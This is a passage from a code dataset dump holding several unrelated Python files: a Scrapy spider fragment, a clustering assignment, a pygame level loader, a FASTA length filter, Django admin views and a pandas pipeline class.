response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/div[3]/span/text()').get()\n\n        yield user_itemAll","sub_path":"ICE_spider_EXP1/ICE_spider_EXP1/spiders/userspider.py","file_name":"userspider.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"651309365","text":"\"\"\"\nAlgorithmic Thinking - Module 3\n10-5-2014\n\nDivide and Conquer Method and Clustering\nClosest Pairs and Clustering Algorithms\nProject File\n\nStudent will implement four functions:\nslow_closest_pairs(cluster_list)\nfast_closest_pair(cluster_list) - implement fast_helper()\nhierarchical_clustering(cluster_list, num_clusters)\nkmeans_clustering(cluster_list, num_clusters, num_iterations)\n\nwhere cluster_list is a list of clusters in the plane\n\"\"\"\n\nimport math\nimport alg_cluster\n\ndef pair_distance(cluster_list, idx1, idx2):\n    \"\"\"\n    Helper function to compute Euclidean distance between two clusters\n    in cluster_list with indices idx1 and idx2\n    \n    Returns tuple (dist, idx1, idx2) with idx1 < idx2 where dist is distance between\n    cluster_list[idx1] and cluster_list[idx2]\n    \"\"\"\n    return (cluster_list[idx1].distance(cluster_list[idx2]), min(idx1, idx2), max(idx1, idx2))\n\n\n\ndef slow_closest_pairs(cluster_list):\n    \"\"\"\n    Compute the set of closest pairs of clusters in a list of clusters\n    using the O(n^2) all-pairs algorithm\n    \n    Returns the set of all tuples of the form (dist, idx1, idx2) \n    where the 
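# --- Editor's aside (hedged): the spider above threads data between callbacks via
# Request.meta. Since Scrapy 1.7, the cb_kwargs argument passes such values as plain
# callback parameters, which is the documented alternative to this use of meta.
# Minimal sketch with an invented spider and selectors:
import scrapy

class ProfileSpider(scrapy.Spider):
    name = "profiles"
    start_urls = ["https://example.com/users"]

    def parse(self, response):
        for href in response.css("a::attr(href)").getall():
            yield scrapy.Request(
                response.urljoin(href),
                callback=self.parse_profile,
                cb_kwargs={"username": href.rstrip("/").split("/")[-1]},
            )

    def parse_profile(self, response, username):
        # username arrives as a normal keyword argument, not via response.meta
        yield {"username": username, "title": response.css("h3::text").get()}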
cluster_list[idx1] and cluster_list[idx2] have minimum distance dist. \n \n \"\"\"\n current_dist = float(\"inf\") # set default current distance\n closest_pair = [] # default empty list\n epsilon = .000000001 # default value to measure against differences\n \n for index_u in xrange(len(cluster_list)): # go through each index\n for index_v in xrange(len(cluster_list)): # each comparison index\n if index_u != index_v: # make sure indeces are not the same\n distance_pair = pair_distance(cluster_list, index_u, index_v) # compute distance based on cluster index\n if abs(distance_pair[0] - current_dist) < epsilon: # test if less than current distance\n closest_pair.append(distance_pair)# assign new distance and cluster indeces\n elif distance_pair[0] < current_dist:\n closest_pair = [distance_pair]\n current_dist = distance_pair[0]\n \n if len(closest_pair) == 0:\n closest_pair = [(current_dist, -1, -1)] # set default distance and index\n return set(closest_pair)\n\n\n\ndef fast_closest_pair(cluster_list):\n \"\"\"\n Compute a closest pair of clusters in cluster_list\n using O(n log(n)) divide and conquer algorithm\n \n Returns a tuple (distance, idx1, idx2) with idx1 < idx 2 where\n cluster_list[idx1] and cluster_list[idx2]\n have the smallest distance dist of any pair of clusters\n \"\"\"\n \n def fast_helper(cluster_list, horiz_order, vert_order):\n \"\"\"\n Divide and conquer method for computing distance between closest pair of points\n Running time is O(n * log(n))\n \n horiz_order and vert_order are lists of indices for clusters\n ordered horizontally and vertically\n \n Returns a tuple (distance, idx1, idx2) with idx1 < idx 2 where\n cluster_list[idx1] and cluster_list[idx2]\n have the smallest distance dist of any pair of clusters\n \n \"\"\"\n if len(horiz_order) < 4: # test if number of clusters less than 4\n list_q = [cluster_list[idx] for idx in horiz_order]\n closest_pair = list(slow_closest_pairs(list_q))\n return tuple((closest_pair[0][0], horiz_order[closest_pair[0][1]], horiz_order[closest_pair[0][2]]))# if less than use brute force algorithm\n ## base case for fast helper\n \n else:\n idx_m = len(horiz_order) / 2 # number of points in each list half\n horiz_left, horiz_right = horiz_order[:idx_m], horiz_order[idx_m:] \n # split lists into halves\n vert_left, vert_right = [idx for idx in vert_order if idx in set(horiz_left)], [idx for idx in vert_order if idx in set(horiz_right)]\n # split vertical elements in half to match horizontal\n left_distance, right_distance = fast_helper(cluster_list, horiz_left, vert_left), fast_helper(cluster_list, horiz_right, vert_right)\n # recursively find the closest distances in the smaller lists\n if left_distance[0] < right_distance[0]:\n closest_pair = left_distance\n else:\n closest_pair = right_distance\n ## divide cluster lists in half and find distances\n \n hcoord = (1/2.0) * (cluster_list[horiz_order[idx_m - 1]].horiz_center() + cluster_list[horiz_order[idx_m]].horiz_center())\n # find the horizontal coordinate of the two middle clusters\n list_split = [idx for idx in vert_order if abs(cluster_list[idx].horiz_center() - hcoord) < closest_pair[0]] \n for idx_u in xrange(len(list_split) - 1):\n for idx_v in xrange(idx_u + 1, min([idx_u + 3, len(list_split) - 1]) + 1):\n contender = pair_distance(cluster_list, list_split[idx_u], list_split[idx_v])\n if closest_pair[0] > contender[0]:\n closest_pair = contender\n ## conquer remaining clusters by comparison\n\n return closest_pair\n \n # compute list of indices for the clusters ordered in 
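# --- Editor's illustration (hedged): the O(n^2) baseline that slow_closest_pairs
# implements over Cluster objects, shown here on bare (x, y) tuples so it runs
# stand-alone (Python 3.8+ for math.dist). The points are invented examples.
import math

def closest_pair_brute(points):
    best = (float("inf"), -1, -1)
    for i in range(len(points)):
        for j in range(i + 1, len(points)):
            d = math.dist(points[i], points[j])
            if d < best[0]:
                best = (d, i, j)
    return best

print(closest_pair_brute([(0, 0), (3, 4), (1, 1), (6, 0)]))
# -> (1.4142135623730951, 0, 2)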
the horizontal direction\n hcoord_and_index = [(cluster_list[idx].horiz_center(), idx) \n for idx in range(len(cluster_list))] \n hcoord_and_index.sort()\n horiz_order = [hcoord_and_index[idx][1] for idx in range(len(hcoord_and_index))]\n \n # compute list of indices for the clusters ordered in vertical direction\n vcoord_and_index = [(cluster_list[idx].vert_center(), idx) \n for idx in range(len(cluster_list))] \n vcoord_and_index.sort()\n vert_order = [vcoord_and_index[idx][1] for idx in range(len(vcoord_and_index))]\n\n # compute answer recursively\n answer = fast_helper(cluster_list, horiz_order, vert_order)\n return (answer[0], min(answer[1:]), max(answer[1:]))\n\n \n\ndef hierarchical_clustering(cluster_list, num_clusters):\n \"\"\"\n Compute a hierarchical clustering of a set of clusters\n Note: the function mutates cluster_list\n \n Input: List of clusters, number of clusters\n Output: List of clusters whose length is num_clusters\n \"\"\"\n while len(cluster_list) > num_clusters:\n current = fast_closest_pair(cluster_list)\n cluster_list[current[1]].merge_clusters(cluster_list[current[2]])\n cluster_list.pop(current[2])\n return cluster_list\n \n \n \ndef kmeans_clustering(cluster_list, num_clusters, num_iterations):\n \"\"\"\n Compute the k-means clustering of a set of clusters\n \n Input: List of clusters, number of clusters, number of iterations\n Output: List of clusters whose length is num_clusters\n \"\"\"\n cluster_list_sorted = sorted(cluster_list, key = lambda x: x.total_population(), reverse = True)\n k_clusters = cluster_list_sorted[:num_clusters]\n # initialize k-means clusters to be initial clusters with largest populations\n for dummy_idx in xrange(num_iterations):\n new_clusters = [alg_cluster.Cluster(set([]), 0, 0, 1, 0) for dummy_idx in xrange(num_clusters)]\n for idx_j in xrange(len(cluster_list)):\n current_dist = [cluster_list[idx_j].distance(k_clusters[idx_l]) for idx_l in xrange(num_clusters)]\n idx_l = min(xrange(len(current_dist)), key=current_dist.__getitem__)\n new_clusters[idx_l].merge_clusters(cluster_list[idx_j]) \n k_clusters = new_clusters[:]\n \n return k_clusters\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"Module 3/Project_3.py","file_name":"Project_3.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"205313663","text":"import json\nimport pygame\n\nclass Level(object):\n _levelDef = None\n surface = None\n _tileSize = None\n\n def __init__(self, levelName):\n with open(levelName, \"r\") as levelData:\n self._levelDef = json.load(levelData)\n self.width = self._levelDef['w']\n self.height = self._levelDef['h']\n\n self.surface = pygame.Surface((self.width, self.height))\n pixels = pygame.PixelArray(self.surface)\n\n for item in self._levelDef['map']:\n x = item['x']\n y = item['y']\n color = tuple(self._levelDef['materials'][item['mat']])\n for dx in range(0, item['w']):\n for dy in range(0, item['h']):\n pixels[x+dx, y+dy] = color\n\n def update(self, tileSize):\n if(tileSize != self._tileSize):\n self.surface = pygame.transform.scale(self.surface, (self.width * tileSize, self.height * tileSize))\n self._tileSize = tileSize\n","sub_path":"level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"651179516","text":"'''\r\nfilter multifasta file with hard seq_length disbalance\r\nshould been in dir with file 
'spisok.txt', which contains:\r\n\r\nfile_name1--seq_length1\r\nfile_name2--seq_length2\r\nfile_name3--seq_length3\r\nfile_name4--seq_length4\r\n    .......\r\nthis dir also contains a dir \"inp\" with fasta files\r\nThe UPGRADE version also adds further sequences if a particular species is not represented\r\nin the file. This was done so that the tree always has at least 7 leaves.\r\n'''\r\n\r\nfrom glob import glob\r\nfrom Bio.Seq import Seq\r\nfrom Bio import SeqIO\r\nimport pandas as pd\r\nfrom os import makedirs\r\nimport os, re\r\nfrom os.path import basename\r\n\r\nos.getcwd()\r\nos.chdir('../input_data/ex_out/out/parsed/out/out_by_gene/')\r\nos.listdir()\r\n\r\n\r\ng=glob('exp_seqs/*.fasta')\r\ng\r\nrecords = []\r\n\r\ntry:\r\n    makedirs('exp_filtred')\r\nexcept OSError:\r\n    pass\r\n\r\n# with open('res.txt','w') as data:\r\n#     pass\r\n\r\nl, h = 200, 200\r\nkey = {}\r\nwith open('spisok.txt') as data:\r\n    for line in data:\r\n        if line.rstrip():\r\n            k = re.split('\\.', line)[0]\r\n            v = int(re.split('--', line)[1])\r\n            key[k] = v\r\n            # line = line.split('--')\r\n            # key[line[0]] = int(line[1].rstrip())\r\n\r\nfor fa in g:\r\n    rec, records = [], []\r\n    k = 0\r\n    spec_all, spec_list, minrec = [], [], []\r\n    for record in SeqIO.parse(fa, 'fasta'):\r\n        f_med = key[re.split('_', basename(fa))[0]]\r\n        # print(f_med)\r\n        k += 1\r\n        spec = record.id.split('_')[0]\r\n        spec_all.append(spec)\r\n        if len(str(record.seq))<=f_med+h and len(str(record.seq))>=f_med-l:\r\n            rec.append(record)\r\n            spec_list.append(spec)\r\n        else:\r\n            h_dist = abs(len(str(record.seq))-(f_med+h))\r\n            l_dist = abs(len(str(record.seq))-(f_med-l))+200\r\n            minrec.append([min(h_dist, l_dist), spec, record])\r\n\r\n\r\n    spec_all = list(set(spec_all))\r\n    spec_list = list(set(spec_list))\r\n    spec_list = [i for i in spec_all if i not in spec_list[:]]\r\n\r\n\r\n    minrec = sorted(minrec, key = lambda x: x[0])\r\n    if spec_list:\r\n        for i in minrec:\r\n            if spec_list:\r\n                if i[1] in spec_list:\r\n                    rec.append(i[2])\r\n                    spec_list.remove(i[1])\r\n            else:\r\n                break\r\n\r\n        with open('res.txt', 'a') as data:\r\n            data.write('\\n'.join([basename(fa)+'--'+str(f_med), 'interval from '+str(f_med-l)+' to '+str(f_med+h), 'all '+str(k),\\\r\n                                   'new the nearest '+str(len(rec)), '']))\r\n    else:\r\n        with open('res.txt','a') as data:\r\n            data.write('\\n'.join([basename(fa)+'--'+str(f_med), 'interval from '+str(f_med-l)+' to '+str(f_med+h), 'all '+str(k), 'new '+str(len(rec)),'']))\r\n\r\n    SeqIO.write(rec,'exp_filtred/'+basename(fa), \"fasta\")\r\n##\r\n##\r\n","sub_path":"scripts/restrict_seq_UPGRADE.py","file_name":"restrict_seq_UPGRADE.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"57518970","text":"#INTERLEAVING OF VECTORS\ndef ordena(m, quant):\n    for i in range(quant - 1):\n        for j in range(i+1, quant):\n            if m[i] > m[j]:\n                x = m[j]\n                m[j] = m[i]\n                m[i] = x\n#def intercala()\n\nm = [9, 7, 3, 5]\nn = [2, 8, 4, 6]\n\nfor c in range(4):\n    print(m[c], end=' ')\nprint()\nfor i in range(4):\n    print(n[i], end=' ')\n\nordena(m, 4)\nprint()\nprint(m, end=' ') \n\nordena(n, 4)\nprint()\nprint(n, end=' ') \n","sub_path":"Semestre1ProjetoALP/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476641334","text":"from rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\n\nfrom django.core import serializers\nfrom rest_framework.response import 
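# --- Editor's condensed sketch (hedged): the core length-window filter from the
# script above, reduced to the essential Biopython calls. The paths, target length
# and window are illustrative values, not taken from the script.
from Bio import SeqIO

def filter_by_length(in_fasta, out_fasta, target, window=200):
    kept = [rec for rec in SeqIO.parse(in_fasta, "fasta")
            if target - window <= len(rec.seq) <= target + window]
    SeqIO.write(kept, out_fasta, "fasta")
    return len(kept)

# e.g. filter_by_length("exp_seqs/geneX.fasta", "exp_filtred/geneX.fasta", 850)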
Response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\ntry:\n from urllib import quote_plus # python 2\nexcept:\n pass\n\ntry:\n from urllib.parse import quote_plus # python 3\nexcept:\n pass\n\nfrom django.contrib import messages\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom django.db.models import Q\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404, HttpResponseForbidden\nfrom django.shortcuts import render, get_object_or_404, redirect\n\nfrom pingow_api import models as m\nfrom pingow_api import serializers as s\nfrom pingow_api.forms import CustomerCreationForm, CustomerForm, AssistanceForm, CustomerTransactionForm\n\ndef db_customer_json (request):\n obj = m.Customer.objects.all()\n serializer =s.CustomerSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_shop_json (request):\n obj = m.Shop.objects.all()\n serializer =s.ShopSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_beacon_json (request):\n obj = m.Beacon.objects.all()\n serializer =s.BeaconSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_beacon_relationship_json (request):\n obj = m.BeaconRelationship.objects.all()\n serializer =s.BeaconRelationshipSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_assistance_json (request):\n obj = m.Assistance.objects.all()\n serializer =s.AssistanceSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_crowd_json (request):\n obj = m.Crowd.objects.all()\n serializer =s.CrowdSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_assistance_avail_json (request):\n obj = m.AssistanceAvail.objects.all()\n serializer =s.AssistanceAvailSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_shop_subcat_reference_json (request):\n obj = m.ShopSubCatReference.objects.all()\n serializer =s.ShopSubCatReferenceSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_sub_category_json (request):\n obj = m.SubCategory.objects.all()\n serializer =s.SubCategorySerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_customer_transaction_json (request):\n obj = m.CustomerTransaction.objects.all()\n serializer =s.CustomerTransactionSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\n# ------------------------- Table views\n\ndef db_view_customer(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.Customer.objects.all()\n data_table = m.CustomerTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"CUSTOMER TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_customer_trans(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.CustomerTransaction.objects.all().order_by('-TRANSACTION_ID')\n data_table = m.CustomerTransactionTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"CUSTOMER TRANSACTION TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_customer_trans_status(request):\n if 
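# --- Editor's sketch (hedged): the db_*_json views above all repeat one
# query-serialize-respond pattern; a small factory collapses them. This is a
# refactoring suggestion, not code from the original file.
from django.http import JsonResponse

def make_json_view(model, serializer_class):
    def view(request):
        queryset = model.objects.all()
        serializer = serializer_class(queryset, many=True)
        return JsonResponse(serializer.data, safe=False)
    return view

# e.g. db_customer_json = make_json_view(m.Customer, s.CustomerSerializer)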
not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.CustomerTransactionStatus.objects.all().order_by('-TRANSACTION_ID')\n data_table = m.CustomerTransactionStatusTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"CUSTOMER TRANSACTION STATUS TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_shop(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.Shop.objects.all()\n data_table = m.ShopTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"SHOP TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_sub_category(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.SubCategory.objects.all()\n data_table = m.SubCategoryTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"SUB CATEGORY TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_assistance_avail(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.AssistanceAvail.objects.all()\n data_table = m.AssistanceAvailTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"ASSISTANCE AVAILABILITY TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_assistance(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.Assistance.objects.all()\n data_table = m.AssistanceTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"ASSISTANCE TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\n# ------------ Table update\ndef customer_profile_create(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n form = CustomerCreationForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n messages.success(request, \"Successfully Created\")\n return HttpResponseRedirect(instance.get_absolute_url())\n context = {\n \"form\": form,\n \"title\" : \"Create Customer Profile\"\n }\n return render(request, \"form.html\", context)\n\ndef assistance_update(request, asst_id=None):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n instance = get_object_or_404(m.Assistance, ASST_ID=asst_id)\n form = AssistanceForm(request.POST or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n info_message = \"Assistance \" + asst_id + \" Profile Saved\"\n messages.success(request, info_message ,\n extra_tags='html_safe')\n return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n \"form\": form,\n \"title\" : \"Update Assistance Profile\"\n }\n return render(request, \"form.html\", context)\n\ndef customer_trans_update(request, trans_id=None):\n if not request.user.is_staff or not request.user.is_superuser:\n 
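# --- Editor's sketch (hedged): every view in this module opens with the same staff
# check; a decorator removes the repetition. Note the original condition
# `not is_staff or not is_superuser` rejects staff who are not also superusers; the
# decorator reproduces it verbatim rather than second-guessing intent.
import functools
from django.core.exceptions import PermissionDenied

def staff_required(view):
    @functools.wraps(view)
    def wrapper(request, *args, **kwargs):
        if not request.user.is_staff or not request.user.is_superuser:
            raise PermissionDenied("Please login as Admin/Staff role to access this page.")
        return view(request, *args, **kwargs)
    return wrapper

# e.g.
# @staff_required
# def db_view_customer(request): ...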
raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n instance = get_object_or_404(m.CustomerTransaction, TRANSACTION_ID=trans_id)\n form = CustomerTransactionForm(request.POST or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n info_message = \"TRANSACTION_ID \" + trans_id + \" Saved\"\n messages.success(request, info_message ,\n extra_tags='html_safe')\n return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n \"form\": form,\n \"title\" : \"Update Customer Transaction\"\n }\n return render(request, \"form.html\", context)\n\ndef customer_update(request, customer_id=None):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n instance = get_object_or_404(m.Customer, CUSTOMER_ID=customer_id)\n form = CustomerForm(request.POST or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n info_message = \"TRANSACTION_ID \" + customer_id + \" Saved\"\n messages.success(request, info_message ,\n extra_tags='html_safe')\n return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n \"form\": form,\n \"title\" : \"Update Customer Profile\"\n }\n return render(request, \"form.html\", context)\n","sub_path":"src/pingow_api/db_access/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"359208195","text":"elements = input().split()\n\ncommand = input()\nmoves = 0\nwin = False\nwhile command != \"end\":\n moves += 1\n data = command.split()\n index_1 = int(data[0])\n index_2 = int(data[1])\n\n if not win:\n if index_1 < 0 or index_1 > len(elements) - 1 or index_2 < 0 or index_2 > len(elements) - 1:\n middle = len(elements) // 2\n elements.insert(middle, f\"-{moves}a\")\n elements.insert(middle, f\"-{moves}a\")\n print(\"Invalid input! Adding additional elements to the board\")\n\n elif elements[index_1] == elements[index_2]:\n element = elements[index_1]\n print(f\"Congrats! 
You have found matching elements - {elements[index_1]}!\")\n elements.remove(element)\n elements.remove(element)\n\n elif elements[index_1] != elements[index_2]:\n print(\"Try again!\")\n\n if len(elements) == 0:\n print(f\"You have won in {moves} turns!\")\n win = True\n\n command = input()\n\nif not win:\n print(f\"Sorry you lose :(\\n{' '.join(str(i) for i in elements)}\")\n","sub_path":"Python-Fundamentals/Mid-Exam/Practice-Exams/Exam-12.08.2020/03_memory_game.py","file_name":"03_memory_game.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"408011514","text":"\n\"\"\"\n * @author Dhinakar Panneer Selvam\n * Date Created: 01/21/2018\n * This class is doamin model for Ticket and it is used for cc team to taken care of SARRequest\n \"\"\"\n\n\nimport datetime\n\nfrom project.server import db, bcrypt\nfrom flask import current_app\n\nfrom sqlalchemy import inspect\nfrom sqlalchemy.dialects.mysql import BIGINT\nfrom sqlalchemy.ext.declarative import declarative_base\n\nimport json\n\n\nBase = declarative_base()\n\n\nclass Ticket(db.Model):\n # an email field and a password field\n uid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n type = db.Column(db.String(120))\n time = db.Column(BIGINT)\n changetime = db.Column(BIGINT)\n component = db.Column(db.String(100))\n severity = db.Column(db.String(120))\n priority = db.Column(db.String(120))\n owner = db.Column(db.String(120))\n reporter = db.Column(db.String(120))\n cc = db.Column(db.String(120))\n version = db.Column(db.String(120))\n milestone = db.Column(db.String(120))\n status = db.Column(db.String(120))\n resolution = db.Column(db.String(120))\n summary = db.Column(db.String(120))\n description = db.Column(db.String(120))\n keywords = db.Column(db.String(120))\n product = db.Column(db.String(120))\n id = db.Column(db.Integer)\n sar_id = db.Column(db.Integer, db.ForeignKey('sar.id'))\n created_time = db.Column(db.DateTime, default=datetime.datetime.now())\n modified_time = db.Column(db.DateTime, default=None)\n ticketinfo2 = db.relationship('TicketInfo', lazy='dynamic',\n backref=db.backref('tickets', lazy='joined'))\n #ticket_id = db.Column(db.Integer, db.ForeignKey('ticket.uid'), nullable=False)\n\n def __init__(self, data, id, sar_id=None):\n self.type = data[\"type\"]\n # self.updated_on = data[\"updated_on\"]\n self.component = data[\"component\"]\n self.severity = data[\"severity\"]\n self.priority = data[\"priority\"]\n self.owner = data[\"owner\"]\n self.reporter = data[\"reporter\"]\n self.cc = data[\"cc\"]\n self.version = data[\"version\"]\n self.milestone = data[\"milestone\"]\n self.status = data[\"status\"]\n self.resolution = data[\"resolution\"]\n self.summary = data[\"summary\"]\n self.description = data[\"description\"]\n self.keywords = data[\"keywords\"]\n self.product = data[\"product\"]\n # self.modified_time = data[\"modified_time\"]\n self.id = id\n self.sar_id = sar_id\n\n def to_dict(self):\n return {c.key: getattr(self, c.key) for c in inspect(self).mapper.column_attrs}\n","sub_path":"SAR_WEBSERVICE/project/server/models/Ticket.py","file_name":"Ticket.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"570963315","text":"# -*- coding:utf-8 -*-\nimport abc\nimport sys\nimport inspect\nimport types\nimport itertools\nimport networkx as nx\nfrom pandaspipe.util import patch_list, isSubset\nfrom 
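# --- Editor's stand-alone illustration (hedged): the to_dict pattern used by the
# Ticket model above, shown on a minimal pure-SQLAlchemy model so it runs without the
# Flask app. The model and values are invented.
from sqlalchemy import Column, Integer, String, inspect
from sqlalchemy.ext.declarative import declarative_base

Base = declarative_base()

class Note(Base):
    __tablename__ = "notes"
    id = Column(Integer, primary_key=True)
    text = Column(String(120))

note = Note(id=1, text="hello")
# inspect(obj).mapper.column_attrs lists the mapped columns, exactly as in Ticket.to_dict:
print({c.key: getattr(note, c.key) for c in inspect(note).mapper.column_attrs})
# -> {'id': 1, 'text': 'hello'}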
pandaspipe.base import PipelineEntity\nimport logging\n\n_log = logging.getLogger(__name__)\n_log.addHandler(logging.StreamHandler(stream=sys.stdout))\n\n\nclass Pipeline:\n def __init__(self, name='Undefined Pipeline', env=None):\n \"\"\"(Pipeline, str) -> NoneType\n Creating the contents of the Pipeline Object\n \"\"\"\n if env is None:\n env = {}\n self._entities = []\n self.name = name\n self.env = env\n self.graph = None\n\n def process(self, channels=('root',), ignore_outlet_node=False, output_channels=()):\n \"\"\"(Pipeline, pandas.DataFrame, str) -> type(df_map)\n *Description*\n :param ignore_outlet_node:\n \"\"\"\n start_nodes = [self._get_start_node(channel) for channel in channels]\n active_dfs = {}\n active_nodes = []\n acomplete_nodes = self.graph.nodes()\n complete_nodes = []\n active_nodes.extend(start_nodes)\n while len(active_nodes) > 0:\n next_nodes = []\n processed = False\n for active_node in active_nodes:\n pred_nodes = self.graph.pred.get(active_node).keys()\n depencencies = active_node.external_dependencies\n if (len(pred_nodes) == 0 or isSubset(complete_nodes, pred_nodes)) and isSubset(active_dfs.keys(), depencencies):\n _log.info('Call entity %s' % active_node)\n processed = True\n # Process\n parameters = [active_dfs[channel] for channel in active_node.input_channels]\n if active_node.type in ('node', 'bignode'):\n external_dependencies = {}\n if active_node.external_dependencies:\n for external_dependency in active_node.external_dependencies:\n external_dependencies[external_dependency] = active_dfs[external_dependency]\n self.env['ext_dep'] = external_dependencies\n result = active_node(*parameters)\n active_nodes.remove(active_node)\n complete_nodes.append(active_node)\n acomplete_nodes.remove(active_node)\n # Update active dataframes\n if len(active_node.output_channels) == 1:\n active_dfs[active_node.output_channels[0]] = result\n elif len(active_node.output_channels) > 1:\n active_dfs.update(result)\n # Add next nodes\n for node in self.graph.succ.get(active_node).keys():\n if node not in active_nodes and node not in next_nodes:\n next_nodes.append(node)\n if not processed:\n _log.error('Infinite cycle detected!')\n return None\n active_nodes.extend(next_nodes)\n # Clear useless dfs\n # Check if required by next node\n for channel in active_dfs.keys():\n if channel not in output_channels and len(\n [active_node for active_node in active_nodes if channel in active_node.input_channels]) == 0:\n # Check if required by external dependencies\n required = reduce(lambda x, y: x or y, [channel in node.external_dependencies for node in acomplete_nodes], False)\n if not required:\n active_dfs.pop(channel)\n if len(active_dfs.keys()) == 1:\n return active_dfs.values()[0]\n return active_dfs\n\n def append(self, cls, channel=None, output_channel=None, construct_arguments=()):\n \"\"\"(Pipeline, classobj, str, str) -> NoneType\n *Description*\n :param construct_arguments:\n :param cls:\n :param channel:\n :param output_channel:\n \"\"\"\n self(channel, output_channel, construct_arguments=construct_arguments)(cls)\n\n def build_process_graph(self):\n builder = GraphBuilder(self._entities)\n return builder.build()\n\n def _check_graph(self):\n if self.graph is None:\n self.graph = self.build_process_graph()\n\n def _get_start_node(self, channel):\n self._check_graph()\n nodes = filter(lambda x: channel in x.output_channels and x.type == 'source', self.graph.nodes())\n if len(nodes) > 0:\n return nodes[0]\n raise Exception('You can\\'t use channel without source node')\n\n 
